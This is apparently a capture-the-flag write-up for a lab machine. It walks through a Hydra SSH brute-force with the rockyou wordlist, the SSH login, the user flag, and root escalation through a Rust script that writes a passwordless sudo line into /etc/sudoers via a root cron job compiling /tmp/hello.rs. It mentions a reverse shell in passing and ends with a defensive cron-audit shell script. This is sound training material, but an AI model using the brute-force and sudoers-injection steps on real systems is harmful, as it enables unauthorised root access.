Since no HTTP port was open, my next thought was to brute-force the SSH password.
Hydra brute-force:
└─➜ hydra -l melodi -P /usr/share/wordlists/rockyou.txt 10.10.103.104 ssh -t 4
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-10 12:37:16
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task
[DATA] attacking ssh://10.10.103.104:22/
[STATUS] 81.00 tries/min, 81 tries in 00:01h, 14344317 to do in 2951:31h, 4 active
[22][ssh] host: 10.10.103.104   login: melodi   password: princess1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-10 12:38:56
Password found: princess1
User flag
└─➜ ssh melodi@10.10.103.104
The authenticity of host '10.10.103.104 (10.10.103.104)' can't be established.
ED25519 key fingerprint is SHA256:G7f5Il1Yitj0F1y5OmeYSgwUVJbsq01WBas04KF+LPo.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:36: 10.10.224.19
    ~/.ssh/known_hosts:38: 10.10.211.116
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.103.104' (ED25519) to the list of known hosts.
melodi@10.10.103.104's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-167-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Last login: Thu Dec  7 18:33:34 2023
melodi@ubuntu:~$ ls
fl4g.txt
melodi@ubuntu:~$ cat fl4g.txt
YCTF{15_1t_e45y??}
Flag: YCTF{15_1t_e45y??}
Root flag
I used pspy64 to see which processes were running on the machine.
Every minute, root compiles the script at /tmp/hello.rs (and runs it?).
Let's add ourselves to the sudoers list (note: this isn't the way I solved this machine).
Before:
melodi@ubuntu:/tmp$ sudo -l
[sudo] password for melodi:
Sorry, user melodi may not run sudo on ubuntu.
Script:
use std::fs::OpenOptions;
use std::io::Write;
use std::path::Path;

fn main() {
    let username = "melodi";

    // Path to the sudoers file
    let sudoers_path = "/etc/sudoers";

    // Check if the file exists
    if !Path::new(sudoers_path).exists() {
        eprintln!("Error: sudoers file not found at {}", sudoers_path);
        return;
    }

    // Open the sudoers file for appending
    let mut file = match OpenOptions::new().append(true).open(sudoers_path) {
        Ok(file) => file,
        Err(err) => {
            eprintln!("Error opening sudoers file: {}", err);
            return;
        }
    };

    // Prepare the line to be added to the sudoers file
    let sudoers_line = format!("{} ALL=(ALL:ALL) NOPASSWD: ALL\n", username);

    // Write the line to the sudoers file
    match file.write_all(sudoers_line.as_bytes()) {
        Ok(_) => println!("Passwordless sudo access added for user: {}", username),
        Err(err) => eprintln!("Error writing to sudoers file: {}", err),
    }
}
After a minute, our script is compiled and run by the root user.
By the way, during the CTF I used a different script: one with a reverse-shell payload pointing at my local machine. I listened with netcat on my machine and got a root shell.
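The root cause on this box is a root scheduled job that compiles and runs a file under /tmp, a directory any local user can write to. The following audit helper is an added example (not from the writeup or the target machine) that flags crontab lines referencing such user-replaceable paths; the sample cron entries and the directory fixture are constructed, since the real crontab was not shown.

```shell
#!/bin/sh
# Audit helper (added example): flag scheduled-job command lines that reference
# files a non-root user could create or replace, as with /tmp/hello.rs above.

# world_writable PATH: true if PATH exists and has the other-write bit set.
world_writable() {
    [ -e "$1" ] && [ -n "$(find "$1" -prune -perm -0002 -print 2>/dev/null)" ]
}

# risky_path PATH: true if PATH itself is writable by others, or if it sits in
# a world-writable directory (like /tmp), where a local user can plant or edit it.
risky_path() {
    if world_writable "$1"; then return 0; fi
    world_writable "$(dirname "$1")"
}

# check_cron_line LINE: print every risky absolute path in an /etc/crontab-style
# line (m h dom mon dow user command); returns 0 if any was found, 1 otherwise.
check_cron_line() {
    found=1
    for tok in $1; do
        case $tok in
            /*) if risky_path "$tok"; then echo "RISKY: $tok"; found=0; fi ;;
        esac
    done
    return $found
}

# build_fixture: constructed layout so the script runs stand-alone; prints its
# root. "tmp" mimics a sticky world-writable /tmp, "usr/local/bin" a root-only dir.
build_fixture() {
    fix=$(mktemp -d)
    mkdir -p "$fix/tmp" "$fix/usr/local/bin"
    chmod 1777 "$fix/tmp"
    chmod 755 "$fix/usr/local/bin"
    : > "$fix/tmp/hello.rs"
    : > "$fix/usr/local/bin/backup.sh"
    chmod 644 "$fix/tmp/hello.rs" "$fix/usr/local/bin/backup.sh"
    echo "$fix"
}

# Demo on two constructed root cron entries: the first mirrors the job shape
# described above, the second is a well-placed root-owned script.
demo=$(build_fixture)
check_cron_line "* * * * * root rustc $demo/tmp/hello.rs -o $demo/tmp/hello && $demo/tmp/hello" \
    || echo "job 1: no risky paths"
check_cron_line "0 3 * * * root $demo/usr/local/bin/backup.sh" || echo "job 2: no risky paths"
rm -rf "$demo"
```

Run it against real entries by feeding lines from /etc/crontab and /etc/cron.d/* to check_cron_line; a hit means the job should reference a root-owned file in a root-owned directory instead.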